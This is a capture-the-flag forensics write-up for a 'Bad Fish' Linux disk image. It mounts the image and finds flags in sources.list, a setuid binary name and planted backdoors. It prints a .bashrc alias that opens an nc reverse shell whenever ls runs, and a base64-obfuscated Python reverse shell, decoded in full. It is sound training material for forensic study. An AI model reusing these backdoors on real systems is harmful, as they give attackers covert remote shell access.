Bad Fish

Stage 001

BRIEFING

Difficulty: Introductory

Uh Oh it seems a few bad fish got into the fish tank!

Can you find them all?

Challenge File: badfish.zip

Zip Password: bAdFi5h

DISCLAIMER: Flag will start with the number of the challenge it belongs to.

EXAMPLE: 1_This_Is_a_Fake_Flag

Work/Solution

Find the offset of the partition.

fdisk -l ./badfish.img
Disk ./badfish.img: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xae84473a

Device         Boot Start     End Sectors  Size Id Type
./badfish.img1 *     2048 2097151 2095104 1023M 83 Linux

The sector size is 512 bytes and the partition starts at sector 2048, so the byte offset is 512 * 2048 = 1048576.

mount -o loop,offset=1048576 badfish.img /mnt/tmp
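The same offset can be read straight from the partition table in sector 0 instead of from fdisk output. This is an added example, not part of the original write-up: the function names are hypothetical, the sample sector is constructed from the values fdisk printed above, and the `ro` and `sizelimit` mount options are additions to the command shown.

```python
import struct

def mbr_partitions(sector0, sector_size=512):
    """Parse the four primary entries of a DOS/MBR partition table."""
    if len(sector0) < 512 or sector0[510:512] != b"\x55\xaa":
        raise ValueError("no 0x55AA signature: not a DOS/MBR disklabel")
    parts = []
    for n in range(4):
        # Entry: status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
        status, ptype, start, count = struct.unpack_from("<B3xB3xII", sector0, 446 + 16 * n)
        if ptype == 0:          # unused slot
            continue
        parts.append({
            "index": n + 1,
            "bootable": status == 0x80,
            "type": ptype,
            "start": start,
            "end": start + count - 1,
            "offset": start * sector_size,        # value for mount -o offset=
            "sizelimit": count * sector_size,     # keeps the loop device inside the partition
        })
    return parts

def sample_mbr():
    """Constructed sector 0 carrying the values fdisk printed for badfish.img."""
    s = bytearray(512)
    struct.pack_into("<I", s, 440, 0xAE84473A)                        # disk identifier
    struct.pack_into("<B3xB3xII", s, 446, 0x80, 0x83, 2048, 2095104)  # badfish.img1
    s[510:512] = b"\x55\xaa"
    return bytes(s)

def mount_options(part):
    # Read-only loop mount of one partition (ro is an addition to the command above).
    return f"ro,loop,offset={part['offset']},sizelimit={part['sizelimit']}"

if __name__ == "__main__":
    for p in mbr_partitions(sample_mbr()):
        print(p, mount_options(p))
```

To use it on the real image, pass the first 512 bytes of badfish.img to `mbr_partitions` in place of `sample_mbr()`.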

Ok, this is a Linux disk image.

la /mnt/tmp
total 76K
lrwxrwxrwx  1 root root    7 Oct  3  2022 bin -> usr/bin
drwxr-xr-x  2 root root 4.0K Oct 23  2022 boot
drwxr-xr-x  4 root root 4.0K Oct 23  2022 dev
drwxr-xr-x 47 root root 4.0K Oct 23  2022 etc
drwxr-xr-x  3 root root 4.0K Oct 23  2022 home
lrwxrwxrwx  1 root root   30 Oct 22  2022 initrd.img -> boot/initrd.img-5.19.0-2-amd64
lrwxrwxrwx  1 root root   30 Oct 22  2022 initrd.img.old -> boot/initrd.img-5.19.0-2-amd64
lrwxrwxrwx  1 root root    7 Oct  3  2022 lib -> usr/lib
lrwxrwxrwx  1 root root    9 Oct  3  2022 lib32 -> usr/lib32
lrwxrwxrwx  1 root root    9 Oct  3  2022 lib64 -> usr/lib64
lrwxrwxrwx  1 root root   10 Oct  3  2022 libx32 -> usr/libx32
drwx------  2 root root  16K Oct 23  2022 lost+found
drwxr-xr-x  2 root root 4.0K Oct  3  2022 media
drwxr-xr-x  2 root root 4.0K Oct  3  2022 mnt
drwxr-xr-x  2 root root 4.0K Oct  3  2022 opt
drwxr-xr-x  2 root root 4.0K Jan 19  2022 proc
drwx------  2 root root 4.0K Oct  3  2022 root
drwxr-xr-x  8 root root 4.0K Oct 22  2022 run
lrwxrwxrwx  1 root root    8 Oct  3  2022 sbin -> usr/sbin
drwxr-xr-x  2 root root 4.0K Oct  3  2022 srv
drwxr-xr-x  2 root root 4.0K Jan 19  2022 sys
drwxrwxrwt  3 root root 4.0K Oct 23  2022 tmp
drwxr-xr-x 14 root root 4.0K Oct  3  2022 usr
drwxr-xr-x 11 root root 4.0K Oct  3  2022 var
lrwxrwxrwx  1 root root   27 Oct 22  2022 vmlinuz -> boot/vmlinuz-5.19.0-2-amd64
lrwxrwxrwx  1 root root   27 Oct 22  2022 vmlinuz.old -> boot/vmlinuz-5.19.0-2-amd64

Found this flag in etc/apt/sources.list.

grep -r "1_" /mnt/tmp/etc
/mnt/tmp/etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs:# /etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs is only used
/mnt/tmp/etc/exim4/conf.d/acl/30_exim4-config_check_rcpt:  # defined in main/01_exim4-config_listmacrosdefs or override them from a
/mnt/tmp/etc/exim4/conf.d/acl/30_exim4-config_check_rcpt:  # main/01_exim4-config_listmacrosdefs:
/mnt/tmp/etc/exim4/conf.d/rewrite/31_exim4-config_rewriting:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### main/01_exim4-config_listmacrosdefs
/mnt/tmp/etc/exim4/exim4.conf.template:# /etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs is only used
/mnt/tmp/etc/exim4/exim4.conf.template:### end main/01_exim4-config_listmacrosdefs
/mnt/tmp/etc/exim4/exim4.conf.template:  # defined in main/01_exim4-config_listmacrosdefs or override them from a
/mnt/tmp/etc/exim4/exim4.conf.template:  # main/01_exim4-config_listmacrosdefs:
/mnt/tmp/etc/exim4/exim4.conf.template:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### end rewrite/31_exim4-config_rewriting
grep: /mnt/tmp/etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg: binary file matches
/mnt/tmp/etc/apt/sources.list:deb 'http://1_5w1m_uP_dA_r3P0/ stretch main contrib non-free
/mnt/tmp/etc/ca-certificates.conf:mozilla/QuoVadis_Root_CA_1_G3.crt

Stage 002

BRIEFING

Difficulty: Introductory

Felines really do love fish.

DISCLAIMER: Flag will start with the number of the challenge it belongs to.

EXAMPLE: 2_This_Is_a_Fake_Flag

Work/Solution

This was the second flag I discovered. While exploring the mounted file system, I looked at the .bashrc file in /home/nemo, where I discovered the flag in an alias.

la home
total 4.0K
drwxr-xr-x 2 8877 8877 4.0K Oct 23  2022 nemo

la home/nemo
total 12K
-rw-r--r-- 1 8877 8877  220 Aug 25  2022 .bash_logout
-rw-r--r-- 1 8877 8877 3.5K Oct 23  2022 .bashrc
-rw-r--r-- 1 8877 8877  807 Aug 25  2022 .profile

tail -n5 home/nemo/.bashrc
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi
alias ls='ls;nc 2_sM31ly_CaT 4454 -e /bin/bash'

Stage 003

BRIEFING

Difficulty: Introductory

Are you concerned how pollution is impacting our oceans?

DISCLAIMER: Flag will start with the number of the challenge it belongs to.

EXAMPLE: 3_This_Is_a_Fake_Flag

Work/Solution

I found this flag while exploring the mounted file system as well. It was in plain sight.

la bin/ | head -n 5
total 45M
-rwsr-xr-x 1 root root     31K Oct 22  2022 3_5tr1nGs_r_BaD_4_f15H
lrwxrwxrwx 1 root root      22 Apr 14  2022 Mail -> /etc/alternatives/Mail
-rwxr-xr-x 1 root root     67K Sep 20  2022 [
-rwxr-xr-x 1 root root     31K Oct 16  2022 addpart

Stage 004

BRIEFING

Difficulty: Easy

SSShhhhhhh! Don't tell anyone I got here.

DISCLAIMER: Flag will start with the number of the challenge it belongs to.

EXAMPLE: 4_This_Is_a_Fake_Flag

Work/Solution

I found this flag while attempting to solve Stage 001. After I mounted the .img file as described in Stage 001, I started poking around the file system. The first place I looked was in /tmp, where I discovered a Python file.

cd /mnt/tmp

la tmp
total 4.0K
drwxr-xr-x 2 root root 4.0K Oct 23  2022 .d

la tmp/.d
total 4.0K
-rwxr-xr-x 1 root root 611 Oct 23  2022 daily.py

The contents of daily.py:

import base64

test = ""
for i in ['YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=', 'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=', 'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=', 'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=', 'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp']:
    test = test + base64.b64decode(i).decode()
eval(test)

I added a print(test) statement to the end of the file:

import base64

test = ""
for i in ['YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=', 'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=', 'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=', 'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=', 'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp']:
    test = test + base64.b64decode(i).decode()
eval(test)
print(test)

Running the Python file:

python tmp/.d/daily.py
base64.b64decode('CmZyb20gb3MgaW1wb3J0IGR1cDIKZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBydW4KaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCI0XzVuM2FreV81bkVha1kiLDg4ODgpKQpkdXAyKHMuZmlsZW5vKCksMCkKZHVwMihzLmZpbGVubygpLDEpCmR1cDIocy5maWxlbm8oKSwyKQpydW4oWyIvYmluL2Jhc2giLCItaSJdKQo=')

Decoding the output string:

echo 'CmZyb20gb3MgaW1wb3J0IGR1cDIKZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBydW4KaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCI0XzVuM2FreV81bkVha1kiLDg4ODgpKQpkdXAyKHMuZmlsZW5vKCksMCkKZHVwMihzLmZpbGVubygpLDEpCmR1cDIocy5maWxlbm8oKSwyKQpydW4oWyIvYmluL2Jhc2giLCItaSJdKQo=' | base64 -d

from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("4_5n3aky_5nEakY",8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])
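The same two layers can be peeled without running the file at all, by parsing daily.py with `ast` and decoding only string literals. This is an added example, not part of the original write-up; the function names are hypothetical and `DAILY_PY` is the file content shown above with the list re-wrapped.

```python
import ast
import base64

# tmp/.d/daily.py as shown above (list re-wrapped for width); parsed, never run.
DAILY_PY = """import base64
test = ""
for i in ['YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=',
          'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=',
          'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=',
          'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=',
          'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp']:
    test = test + base64.b64decode(i).decode()
eval(test)
"""

def chunk_list(source):
    # First list literal consisting only of string constants.
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.List) and node.elts and all(
                isinstance(e, ast.Constant) and isinstance(e.value, str) for e in node.elts):
            return [e.value for e in node.elts]
    raise ValueError("no list of string literals found")

def peel(text):
    # Strip nested b64decode('<literal>') wrappers by parsing, not evaluating.
    layers = 0
    while True:
        try:
            call = ast.parse(text.strip(), mode="eval").body
        except SyntaxError:
            return text, layers          # not a single expression: innermost payload
        func = getattr(call, "func", None)
        args = getattr(call, "args", [])
        if not (getattr(func, "attr", getattr(func, "id", "")) == "b64decode"
                and len(args) == 1 and isinstance(args[0], ast.Constant)
                and isinstance(args[0].value, str)):
            return text, layers
        text = base64.b64decode(args[0].value).decode("utf-8", "replace")
        layers += 1

def connect_targets(payload):
    # (host, port) literals passed to any .connect((host, port)) call.
    return [tuple(ast.literal_eval(e) for e in n.args[0].elts)
            for n in ast.walk(ast.parse(payload))
            if isinstance(n, ast.Call) and getattr(n.func, "attr", "") == "connect"
            and n.args and isinstance(n.args[0], ast.Tuple)]

def analyse(source):
    stage1 = "".join(base64.b64decode(c).decode() for c in chunk_list(source))
    payload, layers = peel(stage1)
    return payload, layers, connect_targets(payload)
```

`analyse(DAILY_PY)` returns the decoded payload text, the number of `b64decode` wrappers removed, and the connect targets, which here carry the Stage 004 flag as the host name.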